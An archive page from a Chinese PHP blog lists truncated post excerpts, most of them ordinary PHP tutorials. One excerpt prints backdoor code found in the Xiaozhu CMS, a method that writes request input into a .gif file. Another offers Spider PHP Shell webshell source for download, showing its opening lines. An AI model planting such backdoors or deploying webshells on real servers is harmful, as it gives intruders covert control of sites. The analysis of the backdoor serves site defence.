• 小猪常见后门和漏洞

    后门一、查找文件TAction.class.php public function test(){ file_put_contents(base64_decode('dHBsL1VzZXIvZGVmYXVsdC9jb21tb24vaW1hZ2VzL2ZhY2UvMTA0LmdpZg=='),htmlspecialchars($_GET['n'])); }* 执行原理PHP图片注入木马//疑似后门,它生成文件tpl/User/default/common/images/face/104.gif 这个文件虽然是104.gif,但它的内容却是由提交参数写入的。 后门二、 TagLib.class.php pub...阅读全文
    作者:admin | 分类:PHP | 阅读:
    Warning: Use of undefined constant the_views - assumed 'the_views' (this will throw an Error in a future version of PHP) in /www/wwwroot/blog.wmphp.com/wp-content/themes/wmphp/archive.php on line 19
    |
  • WordPress 3.9“Smith”简体中文版下载

    今天,开源博客WordPress 3.9简体中文版现已开放下载,或在您的WordPress仪表盘中升级。本次WordPress 3.9命名为“Smith”,以纪念吉米·史密斯,爵士风琴家。这次发布包含了众多细部修改,推荐普通用户升级。   WordPress 3.9更新日志: • 更流畅的媒体编辑体验 • 改良的可视化编辑 新的可视化编辑器在速度、可用性、移动支持方面都有了进步。您现在可以从您的文字处理器中直接粘贴文...阅读全文
    作者:admin | 分类:PHP | 阅读:
    Warning: Use of undefined constant the_views - assumed 'the_views' (this will throw an Error in a future version of PHP) in /www/wwwroot/blog.wmphp.com/wp-content/themes/wmphp/archive.php on line 19
    |
  • PHP学习整理

    第23 字符串的处理 一、字符串的格式化 chop()函数移除字符串后面多余的空白,包括新行。//这个不重要 ltrim()函数移除字符串起始处多余空白。//只清理左边 rtrim()函数移除字符串后面多余的空白,包括新行,此函数是chop()的别名。//只清理右边 trim()函数移除字符串两边多余的空白。 <?php echo trim(' php '); ?> nl2br()函数将字符串作为输入参数,用XHTML中的<br />标记代...阅读全文
    作者:admin | 分类:PHP | 阅读:
    Warning: Use of undefined constant the_views - assumed 'the_views' (this will throw an Error in a future version of PHP) in /www/wwwroot/blog.wmphp.com/wp-content/themes/wmphp/archive.php on line 19
    |
  • 非常实用的PHP在线解压缩程序

    一般我们通过FTP上传或者下载网站文件时,用于文件数量多的原因,FTP方式只能逐个目录查找,增加了反应时间,上传12M网站文件,需要30分钟,而且经常会遇到服务器断开,以及漏传等现像,通过PHP在线解压程序,同样是上传相同的文件,不超过3分钟即可完成整站上传或下载,可以完美解决该问题。一份ya.php用于压缩网站文件,还有一份phpzip用于压缩单个文件夹,和解压文件,效果图如下: &n...阅读全文
    作者:admin | 分类:PHP | 阅读:
    Warning: Use of undefined constant the_views - assumed 'the_views' (this will throw an Error in a future version of PHP) in /www/wwwroot/blog.wmphp.com/wp-content/themes/wmphp/archive.php on line 19
    |
  • 万能密码重设工具

    程序下载地址:http://blog.wmphp.com/key_god.zip [更新纪录-2013.10.28] *版本升级为V1.1,加入本地锁定功能(当卸载失败的情况下将被锁定)并修正n个bug。 [更新纪录-2013.10.23] *增加"找回密码后自动强制卸载本程序"功能。 [更新纪录-2013.10.19] * “云端”加入支持HDwiki、Shopex策略。 [更新纪录-2013.10.18] * “云端”加入支持ECshop的策略,并更新Discuz_Ucenter策略。 Q:...阅读全文
    作者:admin | 分类:PHP | 阅读:
    Warning: Use of undefined constant the_views - assumed 'the_views' (this will throw an Error in a future version of PHP) in /www/wwwroot/blog.wmphp.com/wp-content/themes/wmphp/archive.php on line 19
    |
  • PHP初学者头痛的14个问题

    【1】面之间无法传递变量 get,post,session在最新的php 版本中自动全局变量是关闭的,所以要从上一面取得提交过来得变量要使用$_GET[’foo’],$_POST[’foo’],$_SESSION[’foo’]来得到。当然也可以修改自动全局变量为开(php .ini改为register_globals = On);考虑到兼容性,还是强迫自己熟悉新的写法比较好。 【2】Win下apache 用get方法传递中文参数会出错:   test.php ?a=你好&b=你也...阅读全文
    作者:admin | 分类:PHP | 阅读:
    Warning: Use of undefined constant the_views - assumed 'the_views' (this will throw an Error in a future version of PHP) in /www/wwwroot/blog.wmphp.com/wp-content/themes/wmphp/archive.php on line 19
    |
  • Thinkphp之Access denied for user 'root'@'localhost' (using password: YES)

    数据库配置文件(/public/db.global.php)已经修改,前台功能也完全正常,但访问后台时却出现类似下面的问题。hinkphp数据库连接错误 系统发生错误 [ 错误信息 ] Access denied for user ‘root’@'localhost’ (using password: YES) 原因是系统是基于thinkphp开发框架开发的网站程序。 thinkphp的数据库连接文件是通过调用方式调用方唯本身的数据库配置文件。 但是在利用thinkphp开发的时候,...阅读全文
    作者:admin | 分类:Thinkphp | 阅读:
    Warning: Use of undefined constant the_views - assumed 'the_views' (this will throw an Error in a future version of PHP) in /www/wwwroot/blog.wmphp.com/wp-content/themes/wmphp/archive.php on line 19
    |
  • PHP执行系统命令简介

    在PHP中调用外部命令,可以用如下三种方法来实现: 方法一:用PHP提供的专门函数(四个): PHP提供4个专门的执行外部命令的函数:exec(), system(), passthru(), shell_exec() 1)exec() 原型: string exec ( string $command [, array &$output [, int &$return_var ]] ) 说明: exec执行系统外部命令时不会输出结果,而是返回结果的最后一行。如果想得到结果,可以使用第二个参数,让其输...阅读全文
    作者:admin | 分类:PHP | 阅读:
    Warning: Use of undefined constant the_views - assumed 'the_views' (this will throw an Error in a future version of PHP) in /www/wwwroot/blog.wmphp.com/wp-content/themes/wmphp/archive.php on line 19
    |
  • php面试题及答案

    基础题: 1.表单中 get与post提交方法的区别? 答:get是发送请求HTTP协议通过url参数传递进行接收,而post是实体数据,可以通过表单提交大量信息. 2.session与cookie的区别? 答:session:储存用户访问的全局唯一变量,存储在服务器上的php指定的目录中的(session_dir)的位置进行的存放 cookie:用来存储连续訪問一个頁面时所使用,是存储在客户端,对于Cookie来说是存储在用户WIN的Temp目录中的...阅读全文
    作者:admin | 分类:PHP | 阅读:
    Warning: Use of undefined constant the_views - assumed 'the_views' (this will throw an Error in a future version of PHP) in /www/wwwroot/blog.wmphp.com/wp-content/themes/wmphp/archive.php on line 19
    |
  • Spider PHP Shell(SPS-3.0)源代码(已去后门版)

    Spider PHP Shell (SPS-3.0) 源代码(已去后门版),大家可以放心使用,对于网站维护是非常必要的。 WebShell下载地址:http://blog.wmphp.com/Spider.rar <?php $password = "wmphp.com";//设置密码 error_reporting(E_ERROR); header("content-Type: text/html; charset=gb2312"); set_time_limit(0); function Root_GP(&$array) { while(list($key,$var) = each($array)) { if((s...阅读全文
    作者:admin | 分类:PHP | 阅读:
    Warning: Use of undefined constant the_views - assumed 'the_views' (this will throw an Error in a future version of PHP) in /www/wwwroot/blog.wmphp.com/wp-content/themes/wmphp/archive.php on line 19
    |
  • PHP Non Thread Safe与Thread Safe

    一、如何选择PHP5.3的VC9版本和VC6版本 VC6版本是使用Visual Studio 6编译器编译的,如果你的PHP是用Apache来架设的,那你就选择VC6版本。 VC9版本是使用Visual Studio 2008编译器编译的,如果你的PHP是用IIS来架设的,那你就选择VC9版本。 二、如何选择PHP5.3的Thread Safe和Non Thread Safe版本 先从字面意思上理解,Thread Safe是线程安全,执行时会进行线程(Thread)安全...阅读全文
    作者:admin | 分类:PHP | 阅读:
    Warning: Use of undefined constant the_views - assumed 'the_views' (this will throw an Error in a future version of PHP) in /www/wwwroot/blog.wmphp.com/wp-content/themes/wmphp/archive.php on line 19
    | 标签: